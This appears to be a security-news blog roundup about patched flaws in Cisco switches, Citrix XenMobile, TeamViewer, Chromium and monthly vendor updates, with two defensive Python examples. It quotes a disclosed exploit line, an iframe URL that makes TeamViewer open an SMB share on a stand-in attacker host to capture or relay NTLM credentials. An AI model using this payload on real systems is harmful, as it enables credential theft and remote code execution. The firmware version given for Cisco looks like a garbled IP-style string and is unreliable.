Been a while, hasn’t it? After another brief hiatus, Threat Thursday returns with the most pertinent cyber security news of the past fortnight.
It’s a software special this week - with vital updates for Windows, Adobe and several popular business applications making the bulk of the headlines.
Latest Cisco Updates Flip the Switch on DoS Attacks
Some of Cisco’s most popular small business switches received an update last Thursday, following the discovery of a security flaw which exposed them all to debilitating DoS (Denial of Service) attacks.
The exploit, which was 0.4 points away from a ‘Critical’ grade on the Common Vulnerability Scoring System, stems from each switch’s flawed validation of IPv6 packets. As Cisco themselves explain in their security bulletin:
“The vulnerability is due to insufficient validation of incoming IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet through an affected device. A successful exploit could allow the attacker to cause an unexpected reboot of the switch, leading to a DoS condition.”
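To make “insufficient validation of incoming IPv6 traffic” a little more concrete, here is an added example (our own illustration for this post, not Cisco’s code and not a reconstruction of the actual bug) of the bounds checks a packet parser should make on the IPv6 fixed header and its extension-header chain before anything downstream is allowed to trust the packet. The `build_packet` helper, the sample packets and the `MAX_EXTENSION_HEADERS` limit are constructed for the demonstration.

```python
"""Strict validation of an IPv6 packet before further processing.

Added example: a parser that rejects malformed packets instead of trusting
the lengths they declare. Constructed for illustration; it is not Cisco's
code and does not reproduce the specific flaw in the bulletin.
"""
import struct

IPV6_FIXED_HEADER_LEN = 40
# Extension headers that carry a "next header" byte followed by a length byte:
# hop-by-hop (0), routing (43), fragment (44), destination options (60).
EXTENSION_HEADERS = {0, 43, 44, 60}
MAX_EXTENSION_HEADERS = 8  # constructed sanity bound for this example


class MalformedPacket(ValueError):
    """Raised when a packet fails a structural check and must be dropped."""


def validate_ipv6(packet: bytes) -> dict:
    """Return the parsed header fields, or raise MalformedPacket."""
    if len(packet) < IPV6_FIXED_HEADER_LEN:
        raise MalformedPacket("shorter than the 40-byte fixed header")

    first_word, payload_len, next_hdr, hop_limit = struct.unpack("!IHBB", packet[:8])
    version = first_word >> 28
    if version != 6:
        raise MalformedPacket(f"version {version} is not 6")

    # Never believe a declared length that exceeds the bytes actually received.
    if payload_len > len(packet) - IPV6_FIXED_HEADER_LEN:
        raise MalformedPacket("payload length exceeds bytes received")

    src, dst = packet[8:24], packet[24:40]

    # Walk the extension-header chain, bounding every step by the declared payload.
    offset = IPV6_FIXED_HEADER_LEN
    end = IPV6_FIXED_HEADER_LEN + payload_len
    hops = 0
    while next_hdr in EXTENSION_HEADERS:
        hops += 1
        if hops > MAX_EXTENSION_HEADERS:
            raise MalformedPacket("too many extension headers")
        if offset + 2 > end:
            raise MalformedPacket("extension header truncated")
        ext_next, ext_len = packet[offset], packet[offset + 1]
        # The fragment header is a fixed 8 bytes; the others are (ext_len + 1) * 8.
        ext_size = 8 if next_hdr == 44 else (ext_len + 1) * 8
        if offset + ext_size > end:
            raise MalformedPacket("extension header runs past the payload")
        next_hdr = ext_next
        offset += ext_size

    return {
        "version": version,
        "payload_len": payload_len,
        "next_header": next_hdr,
        "hop_limit": hop_limit,
        "src": src,
        "dst": dst,
        "upper_layer_offset": offset,
    }


def is_well_formed(packet: bytes) -> bool:
    """Convenience wrapper: True if the packet passes every structural check."""
    try:
        validate_ipv6(packet)
    except MalformedPacket:
        return False
    return True


def build_packet(payload_len: int, next_hdr: int, body: bytes = b"") -> bytes:
    """Constructed test packet: version 6, zeroed addresses, hop limit 64."""
    header = struct.pack("!IHBB", 6 << 28, payload_len, next_hdr, 64) + bytes(32)
    return header + body


if __name__ == "__main__":
    # Constructed samples: a sane ICMPv6 packet, then ones that lie about their lengths.
    print(validate_ipv6(build_packet(8, 58, bytes(8))))
    print(is_well_formed(build_packet(100, 58, bytes(8))))        # declared > received
    print(is_well_formed(build_packet(8, 0, bytes([58, 5]) + bytes(6))))  # ext header too long
```

The point is the order of operations: every length field is checked against what was actually received before it is used as an offset, and the header chain walk is bounded, so a crafted packet is discarded at the parser rather than reaching code that might crash or reboot on it.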
The vulnerable products, as identified by Cisco, are:
- 250 Series Smart Switches
- 350 Series Managed Switches
- 350X Series Stackable Managed Switches
- 550X Series Stackable Managed Switches
- Small Business 200 Series Smart Switches
- Small Business 300 Series Managed Switches
- Small Business 500 Series Stackable Managed Switches
As expected, however, updates have been made available to address these vulnerabilities. If you recognise any of the above switches as part of your infrastructure, now’s the time to check for the latest firmware version – in this case 188.8.131.52.
Note, however, that the Small Business 200, 300 and 500 series have entered the end-of-software-maintenance milestone. In other words: if these are still part of your infrastructure, consider upgrading to newer tech sharpish. We’d be happy to help – so get in touch if you need any further guidance.
It’s Anything but Zen for Citrix’s Endpoint Management
Citrix’s Endpoint Management system – otherwise known by the infinitely-preferable name of XenMobile – received updates this Tuesday to fix 5 critical vulnerabilities. If exploited, these vulnerabilities would grant remote attackers administrative access to XenMobile servers.
Now, there are a fair few affected servers, each suffering from different exploits and each vulnerable on certain firmware versions; it’s perhaps easiest to link you to Citrix’s own security bulletin so you can best identify your next steps from there. Whichever affected version you’re running, there are links at the bottom of the page to the appropriate patches.
Note that cloud versions of these services have, as expected, already been patched, but according to Citrix’s own advice, “…hybrid rights users need to apply the upgrades to any on-premises instance”, so do bear that in mind.
TeamViewer Exploit Allows for Uncomfortable Levels of Team Viewing
TeamViewer, the popular remote desktop application, has this week received a patch for a high-severity exploit which not only allowed hackers to bypass passwords on the TeamViewer client, but also to perform remote code execution on compromised systems.
Specifically affecting the Windows version of TeamViewer Desktop, the problem stems from the improper quoting of uniform resource identifiers; and if that explanation wasn’t geeky enough for you, then put on those coke-bottle glasses, ‘cause it’s about to get a whole lot geekier.
Jeffrey Hoffman is a security engineer at Praetorian and the discloser of said flaw. According to his brief write-up:
“An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”
While that explanation may fly over the head of your humble Threat Thursday reporters, the MTeam’s more technically minded members will tell you this is no good thing. TeamViewer has since released updates for all versions from 8 through to 15, and that all-important security bulletin can be read here.
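For the technically minded members, the root cause Praetorian describes (an unquoted URI argument) is a class of bug that can be audited for. Here is an added example, written for this post rather than taken from TeamViewer or Praetorian, that checks Windows URL-protocol handler command lines for the tell-tale sign: a `%1` placeholder (the spot where Windows substitutes the full URL) that is not wrapped in double quotes, so a space inside the URL becomes a separate command-line argument. The `SAMPLE_HANDLERS` strings are constructed stand-ins for the default value of `HKEY_CLASSES_ROOT\<scheme>\shell\open\command`; a real audit would read those keys with `winreg` and feed each value to `audit_handler_command`.

```python
"""Audit URL-protocol handler command lines for unquoted placeholders.

Added example for this post; not TeamViewer's or Praetorian's code. The
sample commands below are constructed and do not describe any real product.
"""
import re

# Windows substitutes %1 (the full URL) or %L / %l (long path form) into the command.
PLACEHOLDER = re.compile(r"%[1lL]")

SAMPLE_HANDLERS = {
    # constructed examples of HKCR\<scheme>\shell\open\command default values
    "goodscheme": '"C:\\Program Files\\Example\\app.exe" "%1"',
    "bareplaceholder": '"C:\\Program Files\\Example\\app.exe" %1',
    "bareexe": 'C:\\Program Files\\Example\\app.exe "%1"',
    "nosubstitution": '"C:\\Program Files\\Example\\app.exe"',
}


def audit_handler_command(command: str) -> list[str]:
    """Return a list of findings for one handler command line (empty if clean)."""
    findings = []

    for match in PLACEHOLDER.finditer(command):
        # An odd number of quote characters before the placeholder means it sits
        # inside a quoted argument; an even number means it is bare.
        if command[: match.start()].count('"') % 2 == 0:
            findings.append(f"{match.group()} is not enclosed in double quotes")

    if not command.startswith('"'):
        # Look at the part before any placeholder for an executable path with spaces.
        head = PLACEHOLDER.split(command, 1)[0]
        exe_end = head.lower().find(".exe")
        if exe_end != -1 and " " in head[:exe_end]:
            findings.append("executable path contains a space but is not quoted")

    return findings


def audit_handlers(handlers: dict) -> dict:
    """Map each scheme with at least one finding to its findings."""
    report = {}
    for scheme, command in handlers.items():
        findings = audit_handler_command(command)
        if findings:
            report[scheme] = findings
    return report


if __name__ == "__main__":
    for scheme, findings in audit_handlers(SAMPLE_HANDLERS).items():
        print(f"{scheme}: {'; '.join(findings)}")
```

Quoting the placeholder is the first line of defence, not the last: the application behind the handler still has to treat whatever arrives in that one argument as untrusted data rather than as its own command-line options, which is why vendor patches for this class of bug usually change the argument parsing as well as the registration.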
Mind the Edge of that Seat - It’s Time for the Month’s Latest OS Updates!
Ah yes, I thought we were overdue this one. It’s Threat Thursday’s least-exciting monthly update as Microsoft, Apple, Android and Adobe dropped their big security patches in these past two weeks. Here’s what they’ve been fixing up for us this August.
Over at Microsoft the fixes continue to hit the triple digits, with this latest update coming in at 120 across a series of the big M’s products. Two of these are zero-day vulnerabilities, 17 are critical, and 103 are important. According to reports, those two zero-day vulnerabilities are already under active attack too.
As is almost always the case, the most critical fixes relate to Remote Code Execution vulnerabilities, the most pressing flaws in this case residing in Internet Explorer 11.
Over at Adobe, there’s a more humble update of 26 fixes across Adobe Lightroom, Adobe Acrobat and Adobe Reader. 11 of these were categorised as critical, including a Remote Code Execution vulnerability (take a drink!) in Adobe Reader DC. Lightroom suffered a similar exploit which allowed attackers to execute malicious DLL commands – this too has now been fixed.
Our Android chums came to the party a little earlier this month, dropping their update on the 3rd and providing 54 fixes for their popular operating system. Ranging in severity from ‘High’ to ‘Critical’, you better believe they address a series of Remote Code Execution vulnerabilities. These were found across multiple areas of the Android framework, including media functions, the Android system area and in its Qualcomm components (Qualcomm being the provider behind a number of Android device chips).
Finally, Apple has released fixes for its iCloud for Windows apps, across versions 11.3 and 7.20. The company are notoriously secretive when it comes to their security updates (and you can’t exactly set your watch to their schedule, either). Suffice to say, if you’re running either version, there’s security updates available, and you want ‘em.
Billions of Internet Users Just Dodged a Major Bullet
It’s been revealed that the Chrome, Opera and Edge browsers on Windows, Mac and Android were all susceptible to a serious zero-day flaw. The flaw exists in Chromium, the Google-backed open-source browser project that powers many popular browsers, and relates to Content Security Policy (CSP) enforcement.
In his deep-dive (which is only for the true tech-geeks among us!), Gal Weizman of PerimeterX explains just what CSP means:
“Content Security Policy (CSP) is basically a set of rules set by the website that the browser's role here is to respect and enforce in the name of the website.”
Chromium’s flaw affected potentially billions of users and has exposed some of the world’s biggest websites to compromise since March of last year – yet all is not as drastic as it seems.
The threat has only been classified as ‘moderate’ as the affected sites would have to have first been compromised by a Remote Code Execution (ain’t that just a running theme this week?). Yet as Gal argues, CSP is a security mechanism, and if it can’t protect against exploits even after the site has been breached, it’s failing to do its job properly.
Nonetheless, this flaw has not been observed in the wild, and has since been patched by the Chromium Project, so we all appear to have dodged that bullet. With the cat well and truly out of the bag now, however, it’s best to update your browser accordingly lest you fall prey to this one in future.
Well, that was a surprisingly threat-free Threat Thursday, huh? Here’s hoping next week’s just as kind to us. 2020 owes us that, at least.
Until then, why not sign up to our Threat Thursday newsletter?
Drop your email address in the box on the right➡️, and we’ll make sure you get the latest Threat Thursday updates in your inbox every week.